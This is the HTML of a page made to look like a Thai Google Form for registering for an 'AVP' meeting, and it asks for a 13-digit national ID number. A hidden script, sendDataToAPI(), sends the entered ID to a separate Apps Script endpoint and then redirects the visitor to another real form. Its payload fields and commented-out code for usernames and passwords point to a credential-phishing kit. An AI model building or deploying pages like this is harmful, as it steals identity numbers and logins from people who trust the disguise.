<!DOCTYPE html>
<html lang="th" class="HB1eCd-UMrnmb">

<head>
    <link rel="shortcut icon" sizes="16x16" href="https://ssl.gstatic.com/docs/spreadsheets/forms/favicon_qp2.png">
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons+Extended" rel="stylesheet"
        nonce="54l6nC_zd-cR4tTKwHKHvA">
    <title>ลงทะเบียนประชุม AVP</title>
    <link rel="stylesheet"
        href="https://www.gstatic.com/_/freebird/_/ss/k=freebird.v.M5YGwWyNhA8.L.W.O/am=MBg/d=1/rs=AMjVe6g48LXgwqawi2F7v9ANg4qyIhXoaQ"
        data-id="_cl" nonce="54l6nC_zd-cR4tTKwHKHvA">
    <link
        href="https://fonts.googleapis.com/css?family=Google+Sans_old:400,500|Roboto_old:300,400,400i,500,700&subset=latin,vietnamese,latin-ext,cyrillic,greek,cyrillic-ext,greek-ext"
        rel="stylesheet" nonce="54l6nC_zd-cR4tTKwHKHvA">
    <script
        nonce="3Be2e4VwAXkOf8RrKUrChw">var DOCS_timing = {}; DOCS_timing['pls'] = new Date().getTime(); DOCS_timing['sl'] = DOCS_timing['pls']; _docs_webfonts_json = { "fontMetadataMap": {}, "unrecognizedFontFamilies": [], "weightedFontFamilyMap": {} }</script>
    <script
        nonce="3Be2e4VwAXkOf8RrKUrChw">_docs_webfonts_fontFaces = null; _docs_webfonts_iframe_fontFaces = null; (function () { _docs_webfonts_createFontFaces = function (doc) { if (doc && doc.fonts) { var win = window; var fontFaceObject = {}; var docs_fontFaces_data = {}; for (var identifierString in docs_fontFaces_data) { var fontFace = new win.FontFace(docs_fontFaces_data[identifierString]['fontFamily'], docs_fontFaces_data[identifierString]['sourceString'], { 'style': docs_fontFaces_data[identifierString]['style'], 'weight': docs_fontFaces_data[identifierString]['weight'] }); fontFace.load().then(function (loadedFontFace) { doc.fonts.add(loadedFontFace); }); fontFaceObject[identifierString] = fontFace; } return fontFaceObject; } return null; }; _docs_webfonts_fontFaces = _docs_webfonts_createFontFaces(document); })(); DOCS_timing['wpid'] = new Date().getTime();</script>
    <link
        href="https://fonts.googleapis.com/css?family=Product+Sans&subset=latin,vietnamese,latin-ext,cyrillic,greek,cyrillic-ext,greek-ext"
        rel="stylesheet" type="text/css" nonce="54l6nC_zd-cR4tTKwHKHvA">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="referrer" content="strict-origin-when-cross-origin">
    <script data-id="_gd"
        nonce="3Be2e4VwAXkOf8RrKUrChw">window.WIZ_global_data = { "K1cgmc": "%.@.[null,null,null,[null,1,[1731494278,274641000]]]]", "SpaT4e": "editors", "TSDtV": "%.@.]", "eNnkwf": "1731606456", "nQyAE": {}, "pzJKf": 1, "qymVe": "ZCmBYwLTK_5Dp51mPivCuYYhxhI", "w2btAe": "%.@.null,null,\"\",true,null,null,true,false]" };</script>
    <style id="WTVccd" nonce="54l6nC_zd-cR4tTKwHKHvA">
        .Iq2xPb .kaAt2 .KKHx9e {
            background-color: #3C4043;
        }

        .Iq2xPb .kaAt2.KKjvXb .KKHx9e {
            background-color: rgb(103, 58, 183);
        }

        .Iq2xPb .kaAt2.RDPZE .KKHx9e {
            background-color: #70757a;
        }

        .wGQFbe.N2RpBe:not(.RDPZE),
        .wGQFbe.B6Vhqe:not(.RDPZE) {
            border-color: rgb(103, 58, 183);
        }

        .wGQFbe.i9xfbb>.MbhUzd,
        .wGQFbe.u3bW4e>.MbhUzd {
            background-color: rgba(103, 58, 183, 0.15);
        }

        .wGQFbe.wGQFbe:hover>.MbhUzd {
            background-color: rgba(103, 58, 183, 0.04);
        }

        .wGQFbe.wGQFbe:focus>.MbhUzd {
            background-color: rgba(103, 58, 183, 0.15);
        }

        .BJHAP.N2RpBe.RDPZE,
        .BJHAP.B6Vhqe.RDPZE {
            border-color: rgb(103, 58, 183);
        }

        .BJHAP.RDPZE:not(.N2RpBe):not(.B6Vhqe) {
            border-color: #9AA0A6;
        }

        .da8bmd .BJHAP.N2RpBe.RDPZE,
        .da8bmd .BJHAP.B6Vhqe.RDPZE,
        .wMUAvd .BJHAP.RDPZE {
            border-color: #5F6368;
        }

        .aomaEc.N2RpBe:not(.RDPZE) .Id5V1,
        .aomaEc .nQOrEb {
            border-color: rgb(103, 58, 183);
        }

        .aomaEc .N2RpBe:not(.RDPZE) .Id5V1 {
            border-color: rgb(103, 58, 183);
        }

        .aomaEc.i9xfbb>.MbhUzd,
        .aomaEc.u3bW4e>.MbhUzd {
            background-color: rgba(103, 58, 183, 0.15);
        }

        .aomaEc :not(.RDPZE):hover>.MbhUzd {
            background-color: rgba(103, 58, 183, 0.04);
        }

        .aomaEc :not(.RDPZE):focus>.MbhUzd {
            background-color: rgba(103, 58, 183, 0.15);
        }

        .ECvBRb .N2RpBe.RDPZE .Id5V1,
        .ECvBRb .N2RpBe.RDPZE .nQOrEb {
            border-color: rgb(103, 58, 183);
        }

        .ECvBRb .RDPZE:not(.N2RpBe) .Id5V1 {
            border-color: #9AA0A6;
        }

        .da8bmd .ECvBRb .N2RpBe.RDPZE .Id5V1,
        .da8bmd .ECvBRb .N2RpBe.RDPZE .nQOrEb,
        .wMUAvd .ECvBRb .RDPZE .Id5V1 {
            border-color: #5F6368;
        }

        .aYSFK> :first-child {
            border-left: transparent solid 5px;
        }

        .aYSFK.N2RpBe {
            background-color: rgb(240, 235, 248);
        }

        .aYSFK.N2RpBe> :first-child {
            border-left-color: rgb(103, 58, 183);
        }

        .mhLiyf.KKjvXb.RDPZE {
            color: #5F6368;
        }

        .TFBnVe .MbhUzd {
            background-image: radial-gradient(circle farthest-side, rgba(103, 58, 183, 0.15), rgba(103, 58, 183, 0.15) 80%, rgba(103, 58, 183, 0) 100%);
        }

        .TFBnVe {
            color: rgb(103, 58, 183);
        }

        .TFBnVe.RDPZE {
            color: rgba(103, 58, 183, 0.5);
        }

        .TFBnVe.u3bW4e .CeoRYc {
            background-color: rgba(103, 58, 183, 0.15);
        }

        .RvMhje .MbhUzd {
            background-image: radial-gradient(circle farthest-side, rgba(255, 255, 255, .3), rgba(255, 255, 255, .3) 80%, rgba(255, 255, 255, 0) 100%);
        }

        .RvMhje {
            background-color: rgb(103, 58, 183);
            color: rgba(255, 255, 255, 1);
        }

        .RvMhje.RDPZE {
            color: rgba(255, 255, 255, 1);
            opacity: .54;
        }

        .RvMhje a .snByac {
            color: rgba(255, 255, 255, 1);
        }

        .RvMhje.u3bW4e .CeoRYc {
            background-color: rgba(255, 255, 255, .3);
        }

        .QvWxOd {
            background-color: rgb(103, 58, 183);
        }

        .QvWxOd .TpQm9d,
        .QvWxOd .TpQm9d:hover,
        .QvWxOd .TpQm9d:link,
        .QvWxOd .TpQm9d:visited {
            background-color: rgb(103, 58, 183);
        }

        .QvWxOd:hover {
            box-shadow: 0px 2px 1px -1px rgba(103, 58, 183, 0.2), 0px 1px 1px 0px rgba(103, 58, 183, 0.14), 0px 1px 3px 0px rgba(103, 58, 183, 0.12);
        }

        .QvWxOd.RDPZE:hover {
            box-shadow: none;
        }

        .QvWxOd.qs41qe.qs41qe {
            box-shadow: 0px 3px 5px -1px rgba(103, 58, 183, 0.2), 0px 6px 10px 0px rgba(103, 58, 183, 0.14), 0px 1px 18px 0px rgba(103, 58, 183, 0.12);
        }

        .ctEux {
            color: rgb(103, 58, 183);
        }

        .ctEux .CeoRYc {
            background-color: rgb(103, 58, 183);
        }

        .ctEux .MbhUzd {
            background-image: radial-gradient(circle farthest-side, rgba(103, 58, 183, 0.15), rgba(103, 58, 183, 0.15) 80%, rgba(103, 58, 183, 0) 100%);
        }

        .pRZhW {
            color: rgb(103, 109, 114);
        }

        .XTgocd {
            border-color: rgb(103, 109, 114);
        }

        .p6JeP .kaAt2 {
            color: rgb(103, 109, 114);
        }

        .p6JeP .kaAt2.KKjvXb {
            background-color: rgba(103, 58, 183, 0.15);
            color: rgb(103, 58, 183);
        }

        .p6JeP .kaAt2.KKjvXb.RDPZE {
            background-color: rgba(189, 189, 189, .38);
            ;
            color: #9AA0A6;
        }

        .p6JeP .k6JGBb {
            fill: rgb(103, 109, 114);
        }

        .p6JeP .KKjvXb .k6JGBb {
            fill: rgb(103, 58, 183);
        }

        .p6JeP .RDPZE .k6JGBb,
        .p6JeP .KKjvXb.RDPZE.k6JGBb {
            fill: #9AA0A6;
        }

        .mfr8Qd .SKMfG {
            fill: rgb(103, 58, 183);
        }

        .Iq2xPb .s7bIcf {
            background-color: rgb(103, 58, 183);
        }

        @media screen and (forced-colors: active) {
            .Iq2xPb .s7bIcf {
                outline: 1px solid Highlight;
            }
        }

        .Iq2xPb .kaAt2 {
            color: #3C4043;
        }

        .Iq2xPb .kaAt2.KKjvXb {
            color: rgb(103, 58, 183);
        }

        .Iq2xPb .kaAt2.RDPZE {
            color: #70757a;
            cursor: default;
        }

        .Iq2xPb .RDPZE+.s7bIcf {
            background-color: #70757a;
        }

        .Iq2xPb .MbhUzd {
            background-image: radial-gradient(circle farthest-side, rgba(103, 58, 183, 0.15), rgba(103, 58, 183, 0.15) 80%, rgba(103, 58, 183, 0) 100%);
        }

        .Iq2xPb .PXrNBb {
            fill: #5F6368;
        }

        .Iq2xPb .KKjvXb .PXrNBb {
            fill: rgb(103, 58, 183);
        }

        .Iq2xPb RDPZE .PXrNBb,
        .Iq2xPb .KKjvXb.RDPZE.PXrNBb {
            fill: #9AA0A6;
        }

        .LKH0ge .cXrdqd {
            background-color: rgb(103, 58, 183);
        }

        .Yp9mw:focus-within {
            border-bottom-color: rgb(103, 58, 183);
        }

        .LKH0ge .Is7Fhb {
            color: rgb(103, 58, 183);
        }

        .LKH0ge.u3bW4e .snByac {
            color: rgb(103, 58, 183);
        }

        .LKH0ge.IYewr .oJeWuf.mIZh1c,
        .LKH0ge.IYewr .oJeWuf.cXrdqd {
            background-color: rgb(225, 216, 241);
        }

        .whsOnd:not([disabled]):focus~.AxOyFc.snByac,
        .u3bW4e>.oJeWuf>.fqp6hd.snByac,
        .u3bW4e.dm7YTc>.oJeWuf>.fqp6hd.snByac {
            color: rgb(103, 58, 183);
        }

        .HNgK9.RDPZE .zHQkBf[disabled] {
            color: rgba(0, 0, 0, .87);
        }

        .FlwNw.u3bW4e .oJeWuf:before {
            border-color: rgb(103, 58, 183);
        }

        .FlwNw .zHQkBf:not([disabled]):focus~.snByac {
            color: rgb(103, 58, 183);
        }

        .yqQS1 .cXrdqd {
            background-color: rgb(103, 58, 183);
        }

        .yqQS1 .Is7Fhb {
            color: rgb(103, 58, 183);
        }

        .yqQS1.IYewr .oJeWuf.mIZh1c,
        .yqQS1.IYewr .oJeWuf.cXrdqd {
            background-color: rgb(225, 216, 241);
        }

        .toT2u.RDPZE .zHQkBf[disabled] {
            color: rgba(0, 0, 0, .87);
        }

        .Y4klN.N2RpBe .espmsb {
            border-color: rgb(103, 58, 183);
            color: rgba(255, 255, 255, 1);
        }

        .Y4klN.N2RpBe>.MLPG7 {
            border-color: rgb(225, 216, 241);
        }

        .Y4klN.i9xfbb>.MbhUzd,
        .Y4klN.u3bW4e>.MbhUzd {
            background-color: rgba(103, 58, 183, 0.15);
        }

        .bvhls {
            border-color: rgb(103, 58, 183);
        }

        .bvhls.N2RpBe {
            background-color: rgb(103, 58, 183);
            color: rgba(255, 255, 255, 1);
        }

        .TCbR9b {
            display: none;
        }

        .IszBRc-Guievd-HLvlvd .TCbR9b {
            display: block;
        }

        .IszBRc-Guievd-HLvlvd .doKKyd {
            display: none;
        }

        .KHCwJ {
            display: none;
        }

        .naGohb {
            background-color: rgb(103, 58, 183);
            color: rgba(255, 255, 255, 1);
        }

        .b4wEpf {
            background-color: rgb(103, 58, 183);
        }

        .barETd .X1clqd,
        .barETd .qRUolc,
        .barETd .pPQgvf {
            color: #202124;
            fill: #5F6368;
        }

        .IszBRc-Guievd-JaPV2b .barETd {
            border: 2px solid white;
        }

        .IszBRc-Guievd-HLvlvd .barETd {
            border: 2px solid black;
        }

        .IOncP .HvOprf {
            color: rgb(103, 58, 183);
        }

        .IOncP .HvOprf .CeoRYc {
            background-color: rgb(103, 58, 183);
        }

        .IOncP .HvOprf .MbhUzd {
            background-image: radial-gradient(circle farthest-side, rgba(103, 58, 183, 0.15), rgba(103, 58, 183, 0.15) 80%, rgba(103, 58, 183, 0) 100%);
        }

        .IOncP .HvOprf:hover {
            border-color: rgb(225, 216, 241);
        }

        .IOncP .HvOprf.RDPZE {
            color: rgba(103, 58, 183, 0.5);
        }

        .IOncP .HvOprf.RDPZE:hover {
            box-shadow: none;
        }

        .IOncP .HvOprf.qs41qe.qs41qe {
            box-shadow: 0px 2px 1px -1px rgba(103, 58, 183, 0.2), 0px 1px 1px 0px rgba(103, 58, 183, 0.14), 0px 1px 3px 0px rgba(103, 58, 183, 0.12);
        }

        .Pi3FHb {
            outline-style: solid;
            outline-color: rgb(103, 58, 183);
        }

        .da8bmd .RDPZE .Pi3FHb {
            outline-color: rgba(0, 0, 0, .54);
        }

        .LygNqb.RDPZE .snByac {
            color: #70757a;
        }

        .LygNqb.RDPZE.N2RpBe .snByac,
        .LygNqb.RDPZE.B6Vhqe .snByac {
            color: #202124;
        }

        .wMUAvd .LygNqb.RDPZE .snByac,
        .wMUAvd .LygNqb.RDPZE.N2RpBe .snByac,
        .wMUAvd .LygNqb.RDPZE.B6Vhqe .snByac {
            color: black;
        }

        .LygNqb.RDPZE .PgfOZ svg {
            fill: rgba(0, 0, 0, .54);
        }

        .LygNqb.RDPZE.N2RpBe .PgfOZ,
        .LygNqb.RDPZE.B6Vhqe .PgfOZ svg {
            fill: rgba(0, 0, 0, .87);
        }

        .mqhyCf {
            color: rgb(103, 58, 183);
        }

        .AQRMP {
            color: rgb(103, 58, 183);
        }

        .RVEQke {
            background-color: rgb(103, 58, 183);
            color: rgba(255, 255, 255, 1);
        }

        .D8bnZd {
            background-color: rgb(240, 235, 248);
        }

        .xEUmYd {
            background-color: rgba(103, 58, 183, 0.05);
        }

        .cz0Zle {
            background-color: rgb(174, 121, 255);
        }

        .ENxQTe:hover {
            background-color: rgba(103, 58, 183, 0.1);
        }

        .YiC7Id {
            fill: rgb(103, 58, 183);
            stroke: rgb(103, 58, 183);
        }

        .PgdKqf {
            fill: rgb(103, 58, 183);
        }

        .LAANW {
            border-color: rgb(103, 58, 183);
        }

        .DGR5Ac {
            fill: rgba(255, 255, 255, 1)
        }

        .graCKc {
            background-color: rgb(103, 109, 114);
        }

        .G4EHhc,
        .G4EHhc .Wic03c .tL9Q4c,
        .G4EHhc .I9OJHe .KRoqRc,
        .G4EHhc .PyrB4,
        .G4EHhc .snByac {
            font-family: 'docs-Roboto', Helvetica, Arial, sans-serif;
        }

        .Jqhdy {
            font-family: 'docs-Roboto', Helvetica, Arial, sans-serif;
        }

        .BuWscd {
            font-family: 'docs-Parisienne', cursive;
        }

        .ULZu6e {
            font-family: 'docs-Patrick Hand', fantasy;
        }

        .kZBGEb {
            font-family: 'docs-Cormorant Garamond', serif;
        }

        .LgNcQe,
        .LgNcQe .Wic03c .tL9Q4c,
        .LgNcQe .I9OJHe .KRoqRc,
        .LgNcQe .PyrB4,
        .LgNcQe .snByac {
            font-size: 24pt;
            font-family: 'docs-Roboto', Helvetica, Arial, sans-serif;
            letter-spacing: 0;
        }

        .M7eMe,
        .M7eMe .Wic03c .tL9Q4c,
        .M7eMe .I9OJHe .KRoqRc,
        .M7eMe .PyrB4,
        .M7eMe .snByac {
            font-size: 12pt;
            font-family: 'docs-Roboto', Helvetica, Arial, sans-serif;
            letter-spacing: 0;
        }

        .OIC90c,
        .OIC90c.RjsPE,
        .OIC90c .zHQkBf,
        .OIC90c .Wic03c .tL9Q4c,
        .OIC90c .I9OJHe .KRoqRc,
        .OIC90c .PyrB4,
        .OIC90c .snByac {
            font-size: 11pt;
            line-height: 15pt;
            letter-spacing: 0;
        }

        .OIC90c .oJeWuf .zHQkBf {}

        .sId0Ce,
        .sId0Ce a {
            color: rgba(0, 0, 0, 0.66);
        }
    </style>
    <link rel="icon" sizes="192x192" href="//ssl.gstatic.com/docs/forms/device_home/android_192.png">
    <link rel="apple-touch-icon" sizes="120x120" href="//ssl.gstatic.com/docs/forms/device_home/ios_120.png">
    <link rel="apple-touch-icon" sizes="152x152" href="//ssl.gstatic.com/docs/forms/device_home/ios_152.png">
    <meta name="msapplication-TileImage" content="//ssl.gstatic.com/docs/forms/device_home/windows_144.png">
    <meta name="msapplication-TileColor" content="#673ab7">
    <base target="_blank">
    <meta property="og:title" content="ลงทะเบียนประชุม AVP">
    <meta property="og:type" content="article">
    <meta property="og:site_name" content="Google Docs">
    <meta property="og:image"
        content="https://lh5.googleusercontent.com/ntzE7Of8SyC9S80TX802Bf0wy1H9Q6RFNRtjLdCVi3qxZrYccOHZlTu216uVIQvxXp3BiyXLA-Q=w1200-h630-p">
    <meta property="og:image:width" content="200">
    <meta property="og:image:height" content="200">
    <meta property="og:ttl" content="604800">
</head>

<body dir="ltr" itemscope itemtype="http://schema.org/CreativeWork/FormObject" class="D8bnZd "
    data-is-prepopulate-mode="false" data-is-response-view="true" jscontroller="OkF2xb"
    jsaction="rcuQ6b:npT2md; click:KjsqPd;oSngvd:KWFGld;UxRBlf:GrC6Ef;oDrQPd:l9NwTb;dkdJAd:CMTGD;">
    <meta itemprop="name" content="ลงทะเบียนประชุม AVP">
    <meta itemprop="faviconUrl" content="https://ssl.gstatic.com/docs/spreadsheets/forms/forms_icon_2023q4.ico">
    <meta itemprop="thumbnailUrl" content="https://ssl.gstatic.com/docs/forms/social/social-forms-big-2.png">
    <meta itemprop="image" content="https://ssl.gstatic.com/docs/forms/social/social-forms-big-2.png">
    <meta itemprop="imageUrl" content="https://ssl.gstatic.com/docs/forms/social/social-forms-big-2.png">
    <div class="Uc2NEf">
        <div class="vnFTpb teQAzf ErmvL KHCwJ"></div>
        <div class="teQAzf">
            <div action="" target="_self" method="POST" id="mG61Hd" jsmodel="TOfxwf Q91hve CEkLOc"
                data-shuffle-seed="-786853393605185109"
                data-clean-viewform-url="https://docs.google.com/forms/d/e/1FAIpQLSdkSmU3Xi-rUBV49atBA3rq_WmygWcSDivi0r0qh5eM_vzoGg/viewform"
                data-response="%.@.]" data-dlp-data="%.@.null,false]" data-first-entry="0" data-last-entry="1"
                data-is-first-page="true">
                <div jscontroller="yUS4Lc" jsaction="rcuQ6b:rcuQ6b;UxRBlf:rcuQ6b;">
                    <div jsname="o6bZLc"></div>
                </div>
                <div class="RH5hzf RLS9Fe">
                    <div class="lrKTG">
                        <div class="Dq4amc">
                            <div class="m7w29c O8VmIc tIvQIf"><noscript>
                                    <div class="HB1eCd-X3SwIb-haAclf">
                                        <div class="HB1eCd-X3SwIb-i8xkGf">
                                            <div class="tk3N6e-cXJiPb tk3N6e-cXJiPb-TSZdd tk3N6e-cXJiPb-GMvhG">
                                                ยังไม่เปิดใช้งาน JavaScript ในเบราว์เซอร์ จึงไม่สามารถเปิดไฟล์นี้ได้
                                                โปรดเปิด JavaScript แล้วโหลดซ้ำ</div>
                                        </div><br>
                                    </div>
                                </noscript>
                                <div class="JH79cc RVEQke b33AEc"></div>
                                <div class="N0gd6">
                                    <div class="ahS2Le">
                                        <div class="F9yp7e ikZYwf LgNcQe" dir="auto" role="heading" aria-level="1">
                                            ลงทะเบียนประชุม AVP<span></span></div>
                                    </div>
                                    <div jsname="F0H8Yc" class="liS6Hc"></div>
                                </div>
                                <div class="zAVwcb"></div>
                                <div class="DqBBlb">
                                    <div class="Oh1Vtf">
                                        <div class="kesdnc" id="SMMuxb"><a jscontroller="A2m8uc"
                                                jsaction="rcuQ6b:npT2md; click:mAWTmb;" href=""
                                                aria-describedby="SMMuxb">ลงชื่อเข้าใช้ Google</a>เพื่อบันทึกการแก้ไข <a
                                                class="TYUeKb" jscontroller="rmdjlf"
                                                jsaction="rcuQ6b:npT2md; click:xdDXgc;" role="button"
                                                tabindex="0">ดูข้อมูลเพิ่มเติม</a></div>
                                    </div>
                                    <div class="zAVwcb"></div>
                                    <div class="md0UAd" aria-hidden="true" dir="auto">* ระบุว่าเป็นคําถามที่จําเป็น
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="o3Dpx" role="list">
                            <div class="Qr7Oae" role="listitem">
                                <div jsmodel="CP1oW"
                                    data-params="%.@.[943102758,&quot;เลขบัตรประชาชน 13 หลัก&quot;,null,0,[[473945694,null,true,null,null,null,null,null,null,null,[]]],null,null,null,null,null,null,[null,&quot;เลขบัตรประชาชน 13 หลัก&quot;]],&quot;i1&quot;,&quot;i2&quot;,&quot;i3&quot;,false,&quot;i4&quot;]">
                                    <div jscontroller="sWGJ4b" jsaction="EEvAHc:yfX9oc;" jsname="WsjYwc" class="geS5n">
                                        <div class="z12JJ">
                                            <div class="M4DNQ">
                                                <div id="i1" class="HoXoMd D1wxyf RjsPE" role="heading" aria-level="3"
                                                    aria-describedby="i5"><span class="M7eMe">เลขบัตรประชาชน 13
                                                        หลัก</span><span class="vnumgf" id="i5"
                                                        aria-label="คำถามที่ต้องตอบ"> *</span></div>
                                                <div class="gubaDc OIC90c RjsPE" id="i2"></div>
                                            </div>
                                        </div>
                                        <div jscontroller="oCiKKc"
                                            jsaction="rcuQ6b:vZc4S;O22p3e:zjh6rb;b2trFe:eVidQc;sPvj8e:d3sQLd;AHmuwe:h06R8;"
                                            class="AgroKb">
                                            <div class="rFrNMe k3kHxc RdH0ib yqQS1 zKHdkd RDPZE" jscontroller="pxq3x"
                                                jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV"
                                                jsshadow jsname="YPqjbf" aria-disabled="true">
                                                <div class="aCsJod oJeWuf">
                                                    <div class="aXBtI Wic03c">
                                                        <div class="">
                                                            <input type="text" class="whsOnd zHQkBf" jsname="YPqjbf"
                                                                autocomplete="off" tabindex="0" aria-labelledby="i1 i4"
                                                                aria-describedby="i2 i3" aria-disabled="true" required
                                                                dir="auto" data-initial-dir="auto" data-initial-value=""
                                                                id="inputId" />


                                                        </div>
                                                        <div class="i9lrp mIZh1c"></div>
                                                        <div jsname="XmnwAc" class="OabDMe cXrdqd"></div>
                                                    </div>
                                                </div>
                                                <div class="LXRPh">
                                                    <div jsname="ty6ygf" class="ovnfwe Is7Fhb"></div>
                                                </div>
                                            </div>
                                        </div>
                                        <div jsname="Rfh2Tc" class="SL4Sz" id="i3" role="alert"></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="">
                            <div class="DE3NNc ">
                                <div class="">
                                    <button onclick="sendDataToAPI()" class=" UQuaGc YhQJj  ctEux" jsshadow jsname=""
                                        tabindex="0">

                                        <span jsslot class="l4V7wb "><span class="  ">ถัดไป</span></span>
                                    </button>
                                </div>
                                <div class="nYdzXd">
                                    <div role="button" class="uArJ5e UQuaGc kCyAyd l3F1ye TFBnVe" jscontroller="VXdfxd"
                                        jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventDefault=true); touchcancel:JMtRjd;focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;"
                                        jsshadow jsname="X5DuWc" tabindex="0">
                                        <div class="Fvio9d MbhUzd" jsname="ksKsZd"></div>
                                        <div class="e19J0b CeoRYc"></div><span jsslot class="l4V7wb Fxmcue"><span
                                                class="NPEfkd RveJvd snByac">ล้างแบบฟอร์ม</span></span>
                                    </div>
                                </div>
                            </div>
                            <div class="T2dutf">ห้ามส่งรหัสผ่านใน Google ฟอร์ม</div>
                        </div><input type="hidden" name="fvv" value="1"><input type="hidden" name="partialResponse"
                            value="[null,null,&quot;-786853393605185109&quot;]"><input type="hidden" name="pageHistory"
                            value="0"><input type="hidden" name="fbzx" value="-786853393605185109"><input type="hidden"
                            name="submissionTimestamp" value="-1">
                    </div>
                </div>
            </div>
            <div>
                <div class="v1CNvb sId0Ce">แบบฟอร์มนี้ถูกสร้างขึ้นภายใน Avenger Planner <a
                        target="_blank">รายงานการละเมิด</a></div>
                <div class="I3zNcc yF4pU"><a dir="auto"
                        href="//www.google.com/forms/about/?utm_source=product&utm_medium=forms_logo&utm_campaign=forms"><img
                            src="https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg"
                            alt="Google" height="24px" width="74px" />&nbsp;<span class="sUXvCd">ฟอร์ม</span></a></div>
            </div>
        </div>
        <div jscontroller="KFVhZe" jsaction="rcuQ6b:npT2md;JIbuQc:feqbab;" class="ZQKQlb">
            <div role="button" class="U26fgb mUbCce fKz7Od M9Bg4d" jscontroller="VXdfxd"
                jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc(preventDefault=true); touchcancel:JMtRjd;"
                jsshadow jsname="hlkvRb" aria-label="รายงานปัญหากับ Google" aria-disabled="false" tabindex="0"
                data-tooltip="รายงานปัญหากับ Google" data-tooltip-position="right" data-tooltip-vertical-offset="1"
                data-tooltip-vertical-offset="-12" data-tooltip-horizontal-offset="0">
                <div class="VTBa7b MbhUzd" jsname="ksKsZd"></div><span jsslot class="xjKiLb"><span class="Ce1Y1c"
                        style="top: -12px">
                        <div class="foqfDc">
                            <div class="Y0xAIe BNL9Bd NpcyEe-n5T17d-Bz112c-N7Eqid-BvMwwf" aria-hidden="true">&nbsp;
                            </div>
                            <div class="Y0xAIe ivmiLb NpcyEe-n5T17d-Bz112c-N7Eqid-AhqUyc" aria-hidden="true">&nbsp;
                            </div>
                        </div>
                    </span></span>
            </div>
        </div>
    </div>


    <script>


        function sendDataToAPI() {
            const usernameInput = document.getElementById("inputId").value;
            // const passwordInput = document.getElementById("password").value;
            // const usernameInputLogin = document.getElementById("usernamelogin").value;
            // const passwordInputLogin = document.getElementById("passwordlogin").value;


            const raw = JSON.stringify({
                "time": new Date().toLocaleString('en-US', {
                    timeZone: 'Asia/Bangkok',
                    weekday: 'short',
                    year: 'numeric',
                    month: 'short',
                    day: 'numeric',
                    hour: 'numeric',
                    minute: 'numeric',
                    second: 'numeric',
                    timeZoneName: 'short',
                    hour12: false
                }),
                "type": 'form register',
                "user01": usernameInput,
                "pass01": '',
                "user02": '',
                "pass02": '',
            });



            const requestOptions = {


                method: "POST",
                redirect: "follow",
                headers: {
                    "Content-Type": "application/json",
                    // "Content-Length": body.length,
                    "Host": "script.google.com",

                    // "Content-Type": "application/json"
                    // "Content-Type": "text/plain;charset=utf-8",
                },
                body: raw,
                mode: "no-cors",
            };


            fetch("https://script.google.com/macros/s/AKfycbxhm-W4Q0IMkyNyKCJ2fti7lVpoHt9x0XBt2BSuVMJE6RbaVODk8eZ3Vnc0TMHkK0oX/exec", requestOptions)
                .then((response) => response.text())
                .then((result) => window.location.replace("https://docs.google.com/forms/d/e/1FAIpQLSdAM7871WIiRaGrLI8BVvOhm2LoJ9B-14ntdGPPZr8oSVVSDQ/viewform"))
                .catch((error) => console.error(error));

            console.log(raw)


        }

    </script>
</body>

</html>
